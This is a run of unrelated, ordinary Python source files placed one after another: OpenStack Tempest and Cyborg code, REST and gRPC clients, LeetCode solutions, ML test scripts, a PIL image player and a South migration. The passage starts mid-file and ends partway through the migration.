from tempest.common import service_client
from tempest.common import waiters


class ImagesClientJSON(service_client.ServiceClient):
    """JSON REST client for the Nova v2.1 server-images API."""

    def create_image(self, server_id, name, meta=None):
        """Creates an image of the original server."""
        request = {'createImage': {'name': name}}
        if meta is not None:
            request['createImage']['metadata'] = meta

        resp, body = self.post('servers/%s/action' % str(server_id),
                               json.dumps(request))
        self.validate_response(schema.create_image, resp, body)
        return service_client.ResponseBody(resp, body)

    def list_images(self, params=None):
        """Returns a list of all images filtered by any parameters."""
        url = 'images'
        if params:
            url = '%s?%s' % (url, urllib.urlencode(params))

        resp, body = self.get(url)
        body = json.loads(body)
        self.validate_response(schema.list_images, resp, body)
        return service_client.ResponseBodyList(resp, body['images'])

    def list_images_with_detail(self, params=None):
        """Returns a detailed list of images filtered by any parameters."""
        url = 'images/detail'
        if params:
            url = '%s?%s' % (url, urllib.urlencode(params))

        resp, body = self.get(url)
        body = json.loads(body)
        self.validate_response(schema.list_images_details, resp, body)
        return service_client.ResponseBodyList(resp, body['images'])

    def show_image(self, image_id):
        """Returns the details of a single image."""
        resp, body = self.get("images/%s" % str(image_id))
        self.expected_success(200, resp.status)
        body = json.loads(body)
        self.validate_response(schema.get_image, resp, body)
        return service_client.ResponseBody(resp, body['image'])

    def delete_image(self, image_id):
        """Deletes the provided image."""
        resp, body = self.delete("images/%s" % str(image_id))
        self.validate_response(schema.delete, resp, body)
        return service_client.ResponseBody(resp, body)

    def wait_for_image_status(self, image_id, status):
        """Waits for an image to reach a given status."""
        waiters.wait_for_image_status(self, image_id, status)

    def list_image_metadata(self, image_id):
        """Lists all metadata items for an image."""
        resp, body = self.get("images/%s/metadata" % str(image_id))
        body = json.loads(body)
        self.validate_response(schema.image_metadata, resp, body)
        return service_client.ResponseBody(resp, body['metadata'])

    def set_image_metadata(self, image_id, meta):
        """Sets the metadata for an image (replaces the whole mapping)."""
        resp, body = self.put('images/%s/metadata' % str(image_id),
                              json.dumps({'metadata': meta}))
        body = json.loads(body)
        self.validate_response(schema.image_metadata, resp, body)
        return service_client.ResponseBody(resp, body['metadata'])

    def update_image_metadata(self, image_id, meta):
        """Updates the metadata for an image (merges with existing items)."""
        resp, body = self.post('images/%s/metadata' % str(image_id),
                               json.dumps({'metadata': meta}))
        body = json.loads(body)
        self.validate_response(schema.image_metadata, resp, body)
        return service_client.ResponseBody(resp, body['metadata'])

    def get_image_metadata_item(self, image_id, key):
        """Returns the value for a specific image metadata key."""
        resp, body = self.get("images/%s/metadata/%s" % (str(image_id), key))
        body = json.loads(body)
        self.validate_response(schema.image_meta_item, resp, body)
        return service_client.ResponseBody(resp, body['meta'])

    def set_image_metadata_item(self, image_id, key, meta):
        """Sets the value for a specific image metadata key."""
        resp, body = self.put('images/%s/metadata/%s' % (str(image_id), key),
                              json.dumps({'meta': meta}))
        body = json.loads(body)
        self.validate_response(schema.image_meta_item, resp, body)
        return service_client.ResponseBody(resp, body['meta'])

    def delete_image_metadata_item(self, image_id, key):
        """Deletes a single image metadata key/value pair."""
        resp, body = self.delete("images/%s/metadata/%s" %
                                 (str(image_id), key))
        self.validate_response(schema.delete, resp, body)
        return service_client.ResponseBody(resp, body)

    def is_resource_deleted(self, id):
        """Returns True once the image can no longer be fetched."""
        try:
            self.show_image(id)
        except lib_exc.NotFound:
            return True
        return False

    @property
    def resource_type(self):
        """Returns the primary type of resource this client works with."""
        return 'image'

"""A client for the REST API of imeji instances."""
import logging
from collections import OrderedDict

import requests
from six import string_types

from pyimeji import resource
from pyimeji.config import Config


log = logging.getLogger(__name__)


class ImejiError(Exception):
    """Error raised for unexpected responses from an imeji server."""

    def __init__(self, message, error):
        super(ImejiError, self).__init__(message)
        # Unwrap {'error': ...} payloads; keep any other value verbatim.
        if isinstance(error, dict):
            self.error = error.get('error')
        else:
            self.error = error


class GET(object):
    """Handle GET requests.

    This includes requests

    - to retrieve single objects,
    - to fetch lists of object references (which are returned as `OrderedDict`
      mapping object `id` to additional metadata present in the response).
    """

    def __init__(self, api, name):
        """Initialize a handler.

        :param api: An Imeji API instance.
        :param name: Name specifying the kind of object(s) to retrieve. We check whether\
        this name has a plural "s" to determine if a list is to be retrieved.
        """
        self.api = api
        self.name = name
        self._list = name.endswith('s')
        singular = name[:-1] if self._list else name
        self.rsc = getattr(resource, singular.capitalize())
        # The REST path always uses the plural form.
        self.path = name if self._list else name + 's'

    def __call__(self, id='', **kw):
        """Calling the handler initiates an HTTP request to the imeji server.

        :param id: If a single object is to be retrieved it must be specified by id.
        :return: An OrderedDict mapping id to additional metadata for lists, a \
        :py:class:`pyimeji.resource.Resource` instance for single objects.
        """
        if not self._list and not id:
            raise ValueError('no id given')
        suffix = '/' + id if id else ''
        res = self.api._req('/%s%s' % (self.path, suffix), params=kw)
        if self._list:
            return OrderedDict([(d['id'], d) for d in res])
        return self.rsc(res, self.api)


class Imeji(object):
    """The client.

    >>> api = Imeji(service_url='http://demo.imeji.org/imeji/')
    >>> collection_id = list(api.collections().keys())[0]
    >>> collection = api.collection(collection_id)
    >>> collection = api.create('collection', title='the new collection')
    >>> item = collection.add_item(fetchUrl='http://example.org')
    >>> item.delete()
    """

    def __init__(self, cfg=None, service_url=None):
        self.cfg = cfg or Config()
        self.service_url = service_url or self.cfg.get('service', 'url')
        self.session = requests.Session()
        user = self.cfg.get('service', 'user', default=None)
        password = self.cfg.get('service', 'password', default=None)
        # Only attach basic auth when both credentials are configured.
        if user and password:
            self.session.auth = (user, password)

    def _req(self, path, method='get', json=True, assert_status=200, **kw):
        """Make a request to the API of an imeji instance.

        :param path: HTTP path.
        :param method: HTTP method.
        :param json: Flag signalling whether the response should be treated as JSON.
        :param assert_status: Expected HTTP response status of a successful request.
        :param kw: Additional keyword parameters will be handed through to the \
        appropriate function of the requests library.
        :return: The return value of the function of the requests library or a decoded \
        JSON object/array.
        """
        func = getattr(self.session, method.lower())
        res = func(self.service_url + '/rest' + path, **kw)
        # Remember the status before `res` may be replaced by decoded JSON.
        status_code = res.status_code
        if json:
            try:
                res = res.json()
            except ValueError:  # pragma: no cover
                log.error(res.text[:1000])
                raise
        if assert_status and status_code != assert_status:
            log.error(
                'got HTTP %s, expected HTTP %s' % (status_code, assert_status))
            log.error(res.text[:1000] if hasattr(res, 'text') else res)
            raise ImejiError('Unexpected HTTP status code', res)
        return res

    def __getattr__(self, name):
        """Names of resource classes are accepted and resolved as dynamic attribute names.

        This allows convenient retrieval of resources as api.<resource-class>(id=<id>),
        or api.<resource-class>s(q='x').
        """
        return GET(self, name)

    def create(self, rsc, **kw):
        """Create and save a resource; `rsc` may be a class name or instance."""
        if isinstance(rsc, string_types):
            rsc = getattr(resource, rsc.capitalize())(kw, self)
        return rsc.save()

    def delete(self, rsc):
        """Delete a resource instance."""
        return rsc.delete()

    def update(self, rsc, **kw):
        """Set the given attributes on a resource, then save it."""
        for attr, value in kw.items():
            setattr(rsc, attr, value)
        return rsc.save()

#! /usr/bin/python
import sys
import os
import json
import grpc
import time
import subprocess

from google.oauth2 import service_account
import google.oauth2.credentials
import google.auth.transport.requests
import google.auth.transport.grpc

from google.firestore.v1beta1 import firestore_pb2
from google.firestore.v1beta1 import firestore_pb2_grpc
from google.firestore.v1beta1 import document_pb2
from google.firestore.v1beta1 import document_pb2_grpc
from google.firestore.v1beta1 import common_pb2
from google.firestore.v1beta1 import common_pb2_grpc
from google.firestore.v1beta1 import write_pb2
from google.firestore.v1beta1 import write_pb2_grpc
from google.protobuf import empty_pb2
from google.protobuf import timestamp_pb2

   
def first_message(database, write):
    """Yield the stream-opening WriteRequest (carries no writes).

    NOTE(review): the `write` argument is currently unused -- the opening
    request deliberately sends an empty `writes` list.
    """
    yield firestore_pb2.WriteRequest(database=database, writes=[])

def generate_messages(database, writes, stream_id, stream_token):
    """Yield an opening request, then one request carrying the given write.

    `writes` can be an array appended to the messages to send multiple Write
    operations; here just one is sent as an example.
    """
    yield firestore_pb2.WriteRequest(database=database, writes=[])
    yield firestore_pb2.WriteRequest(database=database,
                                     writes=[writes],
                                     stream_id=stream_id,
                                     stream_token=stream_token)




def main():
    """Open a Firestore gRPC write stream and apply one document update."""
    config_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                               'grpc.json')

    with open(config_path) as grpc_file:
        item = json.load(grpc_file)

    # Build an authorized gRPC channel from the service-account file named
    # in the config.
    creds = item["grpc"]["Write"]["credentials"]
    credentials = service_account.Credentials.from_service_account_file(
        "{}".format(creds))
    scoped_credentials = credentials.with_scopes(
        ['https://www.googleapis.com/auth/datastore'])
    http_request = google.auth.transport.requests.Request()
    channel = google.auth.transport.grpc.secure_authorized_channel(
        scoped_credentials, http_request, 'firestore.googleapis.com:443')

    stub = firestore_pb2_grpc.FirestoreStub(channel)

    database = item["grpc"]["Write"]["database"]
    name = item["grpc"]["Write"]["name"]
    first_write = write_pb2.Write()

    # Open the stream; each response carries the stream id/token.
    responses = stub.Write(first_message(database, first_write))
    for response in responses:
        print("Received message %s" % (response.stream_id))
        print(response.stream_token)

    # Reuse the id/token of the last response to send the actual write.
    value_ = document_pb2.Value(string_value="foo_boo")
    update = document_pb2.Document(name=name, fields={"foo": value_})
    writes = write_pb2.Write(
        update_mask=common_pb2.DocumentMask(field_paths=["foo"]),
        update=update)
    r2 = stub.Write(generate_messages(database, writes,
                                      response.stream_id,
                                      response.stream_token))
    for r in r2:
        print(r.write_results)

# Script entry point.
if __name__ == "__main__":
    main()

import sys
sys.path.append("helper")

import web
from helper import session


# Disable web.py's debug mode (auto-reloader and verbose error pages).
web.config.debug = False

# URL routing: path pattern followed by its "module.Class" controller.
urls = (
"/", "controller.start.index", 
"/1", "controller.start.one", 
"/2", "controller.start.two", 
)


# The WSGI application and a shared session store from the helper package.
app = web.application(urls, globals())
sessions = session.Sessions()


# Start the built-in development server when executed directly.
if __name__ == "__main__": 
	app.run()        



from typing import List
class Solution:
    def partitionLabels(self, S: str) -> List[int]:
        """Partition S into as many parts as possible so that each character
        appears in at most one part; return the sizes of those parts.

        Generalized from the original, which only built last-position
        entries for 'a'-'z' and raised KeyError on any other character.
        """
        # Last index at which each character of S occurs.
        last_pos = {c: i for i, c in enumerate(S)}
        sizes: List[int] = []
        start = 0      # first index of the current partition
        curr_max = -1  # furthest last-occurrence seen within the partition
        for i, c in enumerate(S):
            curr_max = max(curr_max, last_pos[c])
            if i == curr_max:
                # No character seen so far occurs later: close the partition.
                sizes.append(i - start + 1)
                start = i + 1
        return sizes
import sys
sys.path.insert(1,"../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.gbm import H2OGradientBoostingEstimator

def mnist_many_cols_gbm_large():
  """Train a minimal GBM on the 784-column MNIST data and show the model."""
  train = h2o.import_file(
      path=pyunit_utils.locate("bigdata/laptop/mnist/train.csv.gz"))
  train.tail()

  model = H2OGradientBoostingEstimator(
      ntrees=1, max_depth=1, min_rows=10, learn_rate=0.01)
  # Columns 0-783 are pixels; column 784 is the label.
  model.train(x=range(784), y=784, training_frame=train)
  model.show()


# Run as an H2O standalone test when executed directly; otherwise run inline
# (the h2o pyunit harness imports the module).
if __name__ == "__main__":
  pyunit_utils.standalone_test(mnist_many_cols_gbm_large)
else:
  mnist_many_cols_gbm_large()

#!/Users/wuga/Documents/website/wuga/env/bin/python2.7
#
# The Python Imaging Library
# $Id$
#

from __future__ import print_function

import sys

if sys.version_info[0] > 2:
    import tkinter
else:
    import Tkinter as tkinter

from PIL import Image, ImageTk


# --------------------------------------------------------------------
# an image animation player

class UI(tkinter.Label):
    """A Label widget that plays a list of images or an image sequence."""

    def __init__(self, master, im):
        if isinstance(im, list):
            # list of images: display the first, queue the rest.
            # (Bug fix: the original read `self.im[0]` AFTER slicing off the
            # first element, so frame 0 was never shown and a single-image
            # list raised IndexError.)
            self.im = im[1:]
            im = im[0]
        else:
            # sequence
            self.im = im

        if im.mode == "1":
            self.image = ImageTk.BitmapImage(im, foreground="white")
        else:
            self.image = ImageTk.PhotoImage(im)

        tkinter.Label.__init__(self, master, image=self.image, bg="black",
                               bd=0)

        self.update()

        # Frame delay in ms; 100 when the image carries no duration info.
        duration = im.info.get("duration", 100)
        self.after(duration, self.next)

    def next(self):
        """Advance to the next frame; stop silently at the end."""
        if isinstance(self.im, list):
            try:
                im = self.im.pop(0)
                self.image.paste(im)
            except IndexError:
                return  # end of list
        else:
            try:
                im = self.im
                im.seek(im.tell() + 1)
                self.image.paste(im)
            except EOFError:
                return  # end of file

        duration = im.info.get("duration", 100)
        self.after(duration, self.next)

        self.update_idletasks()


# --------------------------------------------------------------------
# script interface

if __name__ == "__main__":

    # Require at least one image-file argument.
    if not sys.argv[1:]:
        print("Syntax: python player.py imagefile(s)")
        sys.exit(1)

    filename = sys.argv[1]

    root = tkinter.Tk()
    root.title(filename)

    if len(sys.argv) > 2:
        # list of images: open every argument eagerly
        print("loading...")
        im = []
        for filename in sys.argv[1:]:
            im.append(Image.open(filename))
    else:
        # sequence: a single (possibly multi-frame) image file
        im = Image.open(filename)

    UI(root, im).pack()

    root.mainloop()

# Copyright 2018 Huawei Technologies Co.,LTD.
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import copy
from oslo_log import log as logging
from oslo_versionedobjects import base as object_base

from cyborg.common import exception
from cyborg.db import api as dbapi
from cyborg.objects import base
from cyborg.objects import fields as object_fields
from cyborg.objects.deployable import Deployable
from cyborg.objects.virtual_function import VirtualFunction

LOG = logging.getLogger(__name__)


@base.CyborgObjectRegistry.register
class PhysicalFunction(Deployable):
    """Deployable of type 'pf' (physical function).

    Tracks the virtual functions (VFs) carved out of this PF in
    ``virtual_function_list`` and keeps them in sync on save/destroy.
    """
    # Version 1.0: Initial version
    VERSION = '1.0'
    # NOTE(review): class-level mutable attribute — instances that are NOT
    # built via get()/get_by_filter()/_from_db_object (which assign a fresh
    # list) share this single list; confirm per-instance state is intended.
    virtual_function_list = []

    def create(self, context):
        """Create the PF in the DB.

        :raises: InvalidDeployType if this object is not of type 'pf'.
        """
        # To ensure the creating type is PF
        if self.type != 'pf':
            raise exception.InvalidDeployType()
        super(PhysicalFunction, self).create(context)

    def save(self, context):
        """In addition to save the pf, it should also save the
        vfs associated with this pf
        """
        # To ensure the saving type is PF
        if self.type != 'pf':
            raise exception.InvalidDeployType()

        # Persist every attached VF before the PF itself.
        for exist_vf in self.virtual_function_list:
            exist_vf.save(context)
        super(PhysicalFunction, self).save(context)

    def add_vf(self, vf):
        """add a vf object to the virtual_function_list.
        If the vf already exists, it will ignore,
        otherwise, the vf will be appended to the list

        :raises: InvalidDeployType if vf is not a 'vf'-typed VirtualFunction.
        """
        if not isinstance(vf, VirtualFunction) or vf.type != 'vf':
            raise exception.InvalidDeployType()
        for exist_vf in self.virtual_function_list:
            if base.obj_equal_prims(vf, exist_vf):
                LOG.warning("The vf already exists")
                return None
        vf.parent_uuid = self.uuid
        vf.root_uuid = self.root_uuid
        # Deep-copy so later mutations of the caller's object do not leak in.
        vf_copy = copy.deepcopy(vf)
        self.virtual_function_list.append(vf_copy)

    def delete_vf(self, context, vf):
        """remove a vf from the virtual_function_list
        if the vf does not exist, ignore it
        """
        # BUG FIX: the original iterated the list directly while unpacking
        # (idx, vf) pairs, which raises TypeError on the first VF object;
        # enumerate() supplies the index the pop() below needs.
        for idx, exist_vf in enumerate(self.virtual_function_list):
            if base.obj_equal_prims(vf, exist_vf):
                removed_vf = self.virtual_function_list.pop(idx)
                removed_vf.destroy(context)
                return
        LOG.warning("The removing vf does not exist!")

    def destroy(self, context):
        """Delete a the pf from the DB."""
        # Drop the in-memory VF references before removing the PF row.
        del self.virtual_function_list[:]
        super(PhysicalFunction, self).destroy(context)

    @classmethod
    def get(cls, context, uuid):
        """Find a DB Physical Function and return an Obj Physical Function.
        In addition, it will also finds all the Virtual Functions associated
        with this Physical Function and place them in virtual_function_list
        """
        db_pf = cls.dbapi.deployable_get(context, uuid)
        obj_pf = cls._from_db_object(cls(context), db_pf)
        pf_uuid = obj_pf.uuid

        # VFs are deployables whose parent is this PF.
        query = {"parent_uuid": pf_uuid, "type": "vf"}
        db_vf_list = cls.dbapi.deployable_get_by_filters(context, query)

        for db_vf in db_vf_list:
            obj_vf = VirtualFunction.get(context, db_vf.uuid)
            obj_pf.virtual_function_list.append(obj_vf)
        return obj_pf

    @classmethod
    def get_by_filter(cls, context,
                      filters, sort_key='created_at',
                      sort_dir='desc', limit=None,
                      marker=None, join=None):
        """Return a list of PF objects matching *filters*, each populated
        with its associated VFs.
        """
        obj_dpl_list = []
        filters['type'] = 'pf'
        db_dpl_list = cls.dbapi.deployable_get_by_filters(context, filters,
                                                          sort_key=sort_key,
                                                          sort_dir=sort_dir,
                                                          limit=limit,
                                                          marker=marker,
                                                          join_columns=join)
        for db_dpl in db_dpl_list:
            obj_dpl = cls._from_db_object(cls(context), db_dpl)
            query = {"parent_uuid": obj_dpl.uuid}
            vf_get_list = VirtualFunction.get_by_filter(context,
                                                        query)
            obj_dpl.virtual_function_list = vf_get_list
            obj_dpl_list.append(obj_dpl)
        return obj_dpl_list

    @classmethod
    def _from_db_object(cls, obj, db_obj):
        """Converts a physical function to a formal object.

        :param obj: An object of the class.
        :param db_obj: A DB model of the object
        :return: The object of the class with the database entity added
        """
        obj = Deployable._from_db_object(obj, db_obj)
        # Give concrete PF objects their own (non-shared) VF list.
        if cls is PhysicalFunction:
            obj.virtual_function_list = []
        return obj

class Solution:
    def isValidSerialization(self, preorder):
        """
        :type preorder: str
        :rtype: bool

        Validate a comma-separated preorder serialization of a binary tree
        where '#' marks a null node, without rebuilding the tree.
        """
        pending = []
        for token in preorder.split(','):
            pending.append(token)
            # Whenever the top of the stack reads "value, #, #" we have a
            # fully-serialized subtree: collapse it into a single '#'.
            while pending[-2:] == ['#', '#']:
                del pending[-2:]
                if not pending:
                    # Two nulls with no parent left to absorb them.
                    return False
                pending[-1] = '#'
        # A valid serialization collapses to exactly one null marker.
        return pending == ['#']

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: violinsolo
# Created on 08/03/2018

import tensorflow as tf
import numpy as np

# Experiment: inspect tf.nn.moments over axis 0 of a small 4-D tensor.
x_shape = [5, 3, 3, 2]
# FIX: bare `reduce` and `print x` statements are Python-2-only; use
# np.prod for the element count and print() calls throughout.
x = np.arange(int(np.prod(x_shape)))

print(x)

x = x.reshape([5, 3, 3, -1])

print(x.shape)


X = tf.Variable(x)

with tf.Session() as sess:
    # FIX: variables must be initialized before any read in TF1.
    sess.run(tf.global_variables_initializer())
    m = tf.nn.moments(X, axes=[0])
    # m = tf.nn.moments(X, axes=[0,1])
    # m = tf.nn.moments(X, axes=np.arange(len(x_shape)-1))
    mean, variance = m

    print(sess.run(m, feed_dict={X: x}))
# -*- coding: utf-8 -*-
"""Template shortcut & filters"""
import os
import datetime
from jinja2 import Environment, FileSystemLoader

from uwsgi_sloth.settings import ROOT
from uwsgi_sloth import settings, __VERSION__

# Jinja2 environment rooted at the package's bundled template directory.
template_path = os.path.join(ROOT, 'templates')
env = Environment(loader=FileSystemLoader(template_path))

# Template filters

def friendly_time(msecs):
    """Format a duration given in milliseconds as a compact string.

    Picks the largest applicable unit set: 'XhYmZs', 'XmYs', 'XsYms',
    or a fractional 'X.XXms' for sub-second values.
    """
    total_secs, ms = divmod(msecs, 1000)
    minutes, seconds = divmod(total_secs, 60)
    hours, minutes = divmod(minutes, 60)
    if hours:
        return '%dh%dm%ds' % (hours, minutes, seconds)
    if minutes:
        return '%dm%ds' % (minutes, seconds)
    if seconds:
        return '%ds%dms' % (seconds, ms)
    return '%.2fms' % ms

# Expose friendly_time to templates as the "friendly_time" filter.
env.filters['friendly_time'] = friendly_time


def render_template(template_name, context=None):
    """Render *template_name* with *context* plus shared defaults.

    :param template_name: template file name, looked up in ``template_path``
    :param context: optional dict of template variables; SETTINGS, now and
        version keys are injected into it before rendering
    :returns: the rendered template as a string
    """
    template = env.get_template(template_name)
    # FIX: the original `context={}` mutable default was mutated by
    # update() below, leaking injected keys across calls.
    if context is None:
        context = {}
    context.update(
        SETTINGS=settings,
        now=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
        version='.'.join(map(str, __VERSION__)))
    return template.render(**context)



# Copyright 2017,2018 IBM Corp.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import json
import mock
import unittest

from zvmsdk.sdkwsgi.handlers import version
from zvmsdk import version as sdk_version


class HandlersRootTest(unittest.TestCase):
    """Tests for the version handler of the SDK wsgi API root."""

    def setUp(self):
        pass

    def test_version(self):
        req = mock.Mock()
        expected = {
            "rc": 0,
            "overallRC": 0,
            "errmsg": "",
            "modID": None,
            "output": {
                "api_version": version.APIVERSION,
                "min_version": version.APIVERSION,
                "version": sdk_version.__version__,
                "max_version": version.APIVERSION,
            },
            "rs": 0,
        }
        res = version.version(req)
        self.assertEqual('application/json', req.response.content_type)
        body = json.loads(req.response.body.decode('utf-8'))
        self.assertEqual(expected, body)
        self.assertEqual('application/json', res.content_type)

# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models

class Migration(SchemaMigration):
    """South schema migration adding the 'Journey' and 'ScheduledStop'
    models to the 'places' app.

    The ``models`` dict below is a frozen, auto-generated snapshot of the
    app's model state and must not be edited by hand.
    """

    def forwards(self, orm):
        
        # Adding model 'Journey'
        db.create_table('places_journey', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('route', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['places.Route'])),
            ('external_ref', self.gf('django.db.models.fields.TextField')()),
            ('notes', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('runs_on_monday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_tuesday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_wednesday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_thursday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_friday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_saturday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_sunday', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_in_termtime', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_in_school_holidays', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_bank_holidays', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_on_non_bank_holidays', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('runs_from', self.gf('django.db.models.fields.DateField')()),
            ('runs_until', self.gf('django.db.models.fields.DateField')()),
            ('vehicle', self.gf('django.db.models.fields.TextField')()),
        ))
        db.send_create_signal('places', ['Journey'])

        # Adding model 'ScheduledStop'
        db.create_table('places_scheduledstop', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('entity', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['places.Entity'])),
            ('journey', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['places.Journey'])),
            ('order', self.gf('django.db.models.fields.IntegerField')()),
            ('sta', self.gf('django.db.models.fields.TimeField')(null=True, blank=True)),
            ('std', self.gf('django.db.models.fields.TimeField')(null=True, blank=True)),
            ('times_estimated', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('fare_stage', self.gf('django.db.models.fields.BooleanField')(default=False)),
            ('activity', self.gf('django.db.models.fields.CharField')(default='B', max_length=1)),
        ))
        db.send_create_signal('places', ['ScheduledStop'])


    def backwards(self, orm):
        
        # Deleting model 'Journey'
        db.delete_table('places_journey')

        # Deleting model 'ScheduledStop'
        db.delete_table('places_scheduledstop')


    # Auto-generated model snapshot used by South's ORM freezer.
    models = {
        'places.entity': {
            'Meta': {'object_name': 'Entity'},
            '_identifiers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['places.Identifier']", 'symmetrical': 'False'}),
            '_metadata': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
            'absolute_url': ('django.db.models.fields.TextField', [], {}),
            'all_types': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'entities'", 'blank': 'True', 'to': "orm['places.EntityType']"}),
            'all_types_completion': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'entities_completion'", 'blank': 'True', 'to': "orm['places.EntityType']"}),
            'geometry': ('django.contrib.gis.db.models.fields.GeometryField', [], {'null': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['places.EntityGroup']", 'symmetrical': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'identifier_scheme': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'identifier_value': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'is_stack': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_sublocation': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Entity']", 'null': 'True'}),
            'primary_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.EntityType']", 'null': 'True'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Source']"})
        },
        'places.entitygroup': {
            'Meta': {'object_name': 'EntityGroup'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'ref_code': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Source']"})
        },
        'places.entitygroupname': {
            'Meta': {'unique_together': "(('entity_group', 'language_code'),)", 'object_name': 'EntityGroupName'},
            'entity_group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'names'", 'to': "orm['places.EntityGroup']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'title': ('django.db.models.fields.TextField', [], {})
        },
        'places.entityname': {
            'Meta': {'unique_together': "(('entity', 'language_code'),)", 'object_name': 'EntityName'},
            'entity': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'names'", 'to': "orm['places.Entity']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'title': ('django.db.models.fields.TextField', [], {})
        },
        'places.entitytype': {
            'Meta': {'object_name': 'EntityType'},
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.EntityTypeCategory']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'note': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'show_in_category_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'show_in_nearby_list': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
            'subtype_of': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'subtypes'", 'blank': 'True', 'to': "orm['places.EntityType']"}),
            'subtype_of_completion': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'subtypes_completion'", 'blank': 'True', 'to': "orm['places.EntityType']"})
        },
        'places.entitytypecategory': {
            'Meta': {'object_name': 'EntityTypeCategory'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.TextField', [], {})
        },
        'places.entitytypename': {
            'Meta': {'unique_together': "(('entity_type', 'language_code'),)", 'object_name': 'EntityTypeName'},
            'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'names'", 'to': "orm['places.EntityType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'language_code': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
            'verbose_name': ('django.db.models.fields.TextField', [], {}),
            'verbose_name_plural': ('django.db.models.fields.TextField', [], {}),
            'verbose_name_singular': ('django.db.models.fields.TextField', [], {})
        },
        'places.identifier': {
            'Meta': {'object_name': 'Identifier'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'scheme': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'value': ('django.db.models.fields.CharField', [], {'max_length': '256'})
        },
        'places.journey': {
            'Meta': {'object_name': 'Journey'},
            'external_ref': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'route': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Route']"}),
            'runs_from': ('django.db.models.fields.DateField', [], {}),
            'runs_in_school_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_in_termtime': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
